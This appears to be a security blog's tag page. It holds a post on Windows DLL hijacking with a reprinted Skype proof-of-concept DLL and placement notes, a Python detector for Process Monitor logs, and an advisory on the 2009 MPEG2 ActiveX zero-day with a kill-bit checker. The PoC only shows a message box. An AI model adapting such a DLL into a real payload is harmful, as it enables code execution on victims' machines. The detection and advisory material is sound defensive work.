Posts Tagged ‘vulnerability’

Have you already heard about the DLL pre-loading/hijacking problem which affects more than 200 Windows applications? This vulnerability is triggered when a vulnerable file type is opened from within a directory controlled by the attacker!

HD Moore (Metasploit) explains the problem and adds a *scanner* into the metasploit framework. Please read his blog entry here (tool for scanning the local machine)


glafkos from Astalavista is now publishing exploit code for various vulnerable file types:
* Skype
* Adobe Illustrator
* Adobe InDesign
* Adobe OnLocation
* Adobe Premium Pro
* Firefox <= 3.6.8
* Teamviewer

======== EXAMPLE OF A POC (SKYPE) ===============================
/*
Exploit Title: Skype <= DLL Hijacking Exploit (wab32.dll)
Date: August 25, 2010
Author: Glafkos Charalambous (glafkos[@]astalavista[dot]com)
Version: Latest Skype v4.2.0.169
Tested on: Windows 7 x64 Ultimate
Vulnerable extensions: .skype
Greetz: Astalavista, OffSEC, Exploit-DB
Notes: Create folders %commonprogramfiles%\system and place wab32.dll
       %commonprogramfiles(x86)% on x64 bit */
#include <windows.h>
#define DllExport __declspec (dllexport)

int dll_hijack(void);

/* Entry point the loader calls when the planted DLL is mapped into the process. */
BOOL WINAPI DllMain(
            HANDLE    hinstDLL,
            DWORD     fdwReason,
            LPVOID    lpvReserved)
{
  dll_hijack();
  return 0;
}

/* Proof-of-concept payload: only shows a message box. */
int dll_hijack(void)
{
  MessageBox(0, "Skype DLL Hijacking!", "DLL Message", MB_OK);
  return 0;
}

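The local scan HD Moore's post describes looks for exactly this pattern: an application probing for a DLL in a directory it does not own. The following is an added example (not HD Moore's tool and not glafkos's code) that applies that check to a Process Monitor CSV export; the sample rows are constructed and the trusted-directory prefixes are an assumption about a default Windows layout.

```python
import csv
import io
import ntpath

# Constructed sample shaped like a Process Monitor CSV export (not a real capture).
# Skype.exe probes for wab32.dll next to the .skype file it is opening; the
# notepad.exe line is a miss inside System32, which a standard user cannot write to.
SAMPLE_PROCMON_CSV = '''\
"Time of Day","Process Name","PID","Operation","Path","Result","Detail"
"10:01:02.100","Skype.exe","1234","CreateFile","C:\\Windows\\System32\\kernel32.dll","SUCCESS","Desired Access: Read"
"10:01:02.110","Skype.exe","1234","CreateFile","\\\\fileserver\\docs\\wab32.dll","NAME NOT FOUND","Desired Access: Read"
"10:01:02.120","Skype.exe","1234","CreateFile","C:\\Users\\bob\\Downloads\\wab32.dll","NAME NOT FOUND","Desired Access: Read"
"10:01:02.130","Skype.exe","1234","CreateFile","C:\\Users\\bob\\Downloads\\invite.skype","SUCCESS","Desired Access: Read"
"10:01:02.140","notepad.exe","2222","CreateFile","C:\\Windows\\System32\\missing.dll","NAME NOT FOUND","Desired Access: Read"
'''

# Directories a standard user cannot write to on a default install (assumption;
# extend for your own layout). Anything else is treated as attacker-controllable.
TRUSTED_PREFIXES = ("c:\\windows\\", "c:\\program files\\", "c:\\program files (x86)\\")
MISSING_RESULTS = {"NAME NOT FOUND", "PATH NOT FOUND"}


def is_untrusted_dir(path):
    """True if the directory part of path lies outside TRUSTED_PREFIXES."""
    directory = ntpath.dirname(path).lower().rstrip("\\") + "\\"
    return not directory.startswith(TRUSTED_PREFIXES)


def find_hijackable_loads(procmon_csv):
    """One finding per DLL a process looked for, but did not find, in a directory
    an attacker could control: a file planted there under that name would be
    loaded instead of the real library."""
    findings = []
    for row in csv.DictReader(io.StringIO(procmon_csv)):
        path = row["Path"]
        if (row["Operation"] != "CreateFile"
                or row["Result"] not in MISSING_RESULTS
                or not path.lower().endswith(".dll")
                or not is_untrusted_dir(path)):
            continue
        findings.append({
            "process": row["Process Name"],
            "pid": int(row["PID"]),
            "dll": ntpath.basename(path).lower(),
            "directory": ntpath.dirname(path).rstrip("\\"),
        })
    return findings


if __name__ == "__main__":
    for f in find_hijackable_loads(SAMPLE_PROCMON_CSV):
        print(f"{f['process']} (pid {f['pid']}) probed for {f['dll']} in {f['directory']}")
```

To audit a real machine, open a document of the file type in question from a network share or download folder while Process Monitor captures with a filter on the application, export to CSV and feed the file to find_hijackable_loads.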

On July 6th, 2009 a zero day vulnerability in a component of the Windows operating system controlling
MPEG2 videos became publicly distributed. The attack code is currently present on several malware
servers in Asia and being used to infect unwitting clients who have been redirected to these servers. This
vulnerability will allow the remote control of clients who are pushed to malicious web servers via XSS or
phishing techniques. Microsoft has not issued a patch for this vulnerability, but they have recommended a
common workaround for dealing with ActiveX vulnerabilities which we have included below under
‘Recommended Preventative Actions’. Only older versions of Windows (2000, XP, 2003) are vulnerable to
this, as Vista and later operating systems have architecture which prevents the vulnerable code from being
exposed to the malicious control object. Major IDS/IPS/AV vendors have released signatures to detect
exploits against this vulnerability.

Severity: MEDIUM

We consider this to be a ‘medium’ severity event. We have not, to this date, seen high infection rates amongst our monitored networks, but vendors are just now releasing signatures to detect the exploit coming back from a malicious webserver to a vulnerable client. This exploit is not related to any worms, but is being used to install Trojan software which may then perform additional attacks on vulnerable hosts via other exploit vectors. While normally we would give ActiveX exploits a low severity, over the past 18 months there has been such a proliferation of SQL Injection attacks resulting in legitimate ASP.NET sites unwittingly serving up malicious javascript that ‘trusting’ the intention of a site is no longer prudent surfing behavior. We feel that the multitude of hacked web environments hosting active pages with malicious javascript inclusions, coupled with newer methods of attack obfuscation, added to the knowledge that MPEG2 is an EXTREMELY popular media format, justifies this severity.

How to Determine Whether You Are Vulnerable:

All 2003 and XP systems will be vulnerable to this unless specific actions have been taken to:
[1] Disable ActiveX altogether (not recommended in many environments)
[2] Not use Internet Explorer at all
[3] Disable Windows Media software via some 3rd-party application
[4] Run updated A/V software which detects the attack and mitigates it
[5] Set the kill-bit for the ActiveX Control Object (CLSID 0955AC62-BF2E-4CBA-A2B9-
[6] Perform an automated scan on hosts that are in the Windows 2003/XP tranche of operating systems.

Recommended Preventive Actions:

Oddly, Microsoft has discovered that no ActiveX control objects which interface with MSvidctl.dll are
needed by Internet Explorer. On Windows XP and 2003 systems they may all be safely disabled by using
the tool Microsoft provides at URL: Later systems such as
Windows Vista, 2008, v7 do not appear to be vulnerable.
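One way to verify item [5] above offline, as an added example that is not part of the original post: parse a `reg export` of the ActiveX Compatibility key and test bit 0x400 (the kill bit) of the control's Compatibility Flags. The CLSID on the page is truncated, so the last group of TARGET_CLSID is a placeholder, and the registry text below is a constructed sample.

```python
import re

# Under HKLM\SOFTWARE\Microsoft\Internet Explorer\ActiveX Compatibility\{CLSID},
# bit 0x400 of "Compatibility Flags" is the kill bit: while it is set, Internet
# Explorer refuses to instantiate that control, whatever a web page asks for.
KILL_BIT = 0x400

# The CLSID on the page is truncated; the last group here is a placeholder.
TARGET_CLSID = "{0955AC62-BF2E-4CBA-A2B9-XXXXXXXXXXXX}"

# Constructed sample in the text format `reg export` writes (not a real export).
SAMPLE_REG_EXPORT = r"""Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\ActiveX Compatibility\{0955AC62-BF2E-4CBA-A2B9-XXXXXXXXXXXX}]
"Compatibility Flags"=dword:00000400

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\ActiveX Compatibility\{11111111-2222-3333-4444-555555555555}]
"Compatibility Flags"=dword:00000000
"""

COMPAT_KEY_RE = re.compile(
    r"^\[HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Internet Explorer\\"
    r"ActiveX Compatibility\\(\{[^\]]+\})\]$")
FLAGS_RE = re.compile(r'^"Compatibility Flags"=dword:([0-9A-Fa-f]{8})$')


def parse_compat_flags(reg_text):
    """Map each CLSID under ActiveX Compatibility to its Compatibility Flags value."""
    flags, current = {}, None
    for line in reg_text.splitlines():
        line = line.strip()
        key = COMPAT_KEY_RE.match(line)
        if key:
            current = key.group(1).upper()
            flags.setdefault(current, 0)      # key present but no value yet: flags 0
        elif line.startswith("["):
            current = None                    # some unrelated key; skip its values
        else:
            value = FLAGS_RE.match(line)
            if value and current is not None:
                flags[current] = int(value.group(1), 16)
    return flags


def kill_bit_set(reg_text, clsid):
    """True only if the control's kill bit is set; a missing key means it is not."""
    return bool(parse_compat_flags(reg_text).get(clsid.upper(), 0) & KILL_BIT)
```

`reg export` writes UTF-16LE, so decode the file before passing it in; on 64-bit Windows the 32-bit Internet Explorer reads the copy under SOFTWARE\Wow6432Node, so export and check that key as well.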

How to Detect Potential Attacks:

Intrusion Detection Systems which have recently released signatures to detect some facet of this attempted exploit (we are currently investigating the efficacy of these signatures and will be updating managed and monitored devices accordingly):
* Tipping Point
Popular antivirus software is detecting attacks as ‘JS/Exploit.CVE-2008-0015.A.Gen trojan’.

What to do if You Have Been Attacked:

Typically workstations, laptops and desktops running XP or 2003 are the ones likely to fall victim to this
type of attack. We recommend consulting your security policy for the Incident Response
procedure as it pertains to the compromised asset. Infection should be considered serious, and
Windows MSRT may or may not be enough to remove the Trojan software that the attacker has installed.

Detailed Analysis:

From Microsoft:
Customers who are using Windows Vista or Windows Server 2008 are not affected because the
ability to pass data to this control within Internet Explorer has been restricted.
By default, Internet Explorer on Windows Server 2003 and 2008 runs in a restricted mode that is
known as Enhanced Security Configuration. Enhanced Security Configuration is a group of
preconfigured settings in Internet Explorer that can reduce the likelihood of a user or administrator
downloading and running specially crafted Web content on a server. This is a mitigating factor for
Web sites that you have not added to the Internet Explorer Trusted sites zone. See also Managing
Internet Explorer Enhanced Security Configuration.
By default, all supported versions of Microsoft Outlook and Microsoft Outlook Express open
HTML e-mail messages in the Restricted sites zone. The Restricted sites zone helps mitigate
attacks that could try to exploit this vulnerability by preventing Active Scripting and ActiveX
controls from being used when reading HTML e-mail messages. However, if a user clicks a link in
an e-mail message, the user could still be vulnerable to exploitation of this vulnerability through
the Web-based attack scenario.
In a Web-based attack scenario, an attacker could host a Web site that contains a Web page that is
used to exploit this vulnerability. In addition, compromised Web sites and Web sites that accept or
host user-provided content or advertisements could contain specially crafted content that could
exploit this vulnerability. In all cases, however, an attacker would have no way to force users to
visit these Web sites. Instead, an attacker would have to persuade users to visit the Web site,
typically by getting them to click a link in an e-mail message or Instant Messenger message that
takes users to the attacker’s Web site.
An attacker who successfully exploited this vulnerability could gain the same user rights as the
local user. Users whose accounts are configured to have fewer user rights on the system could be
less impacted than users who operate with administrative user rights.

Suggested Reading:

Microsoft has developed a new security offering called HELLOSECUREWORLD.COM. It is a program to engage developers in a fun and exciting way to build knowledge around security in application development. In addition, developers can share information about secure coding for today’s internet-based computing environment. The program features an array of online and offline customer activities ranging from MSDN events, to security virtual labs, to video presentations on a new website.


* XSS (Cross Site Scripting)
* SQLi (SQL Injection)
* Canonicalization Attack
* CSRF (Cross Site Request Forgery)
* Integer Overflow/Underflow
* Etc…

To access the labs go to: HelloSecureWorld

-Introducing The SQL Injection Vuln:
SQL injection attacks are also known as SQL insertion.
They take the form of executing some queries against the database and getting access to information (SQL version, number and names of tables and columns, some authentication info, etc…)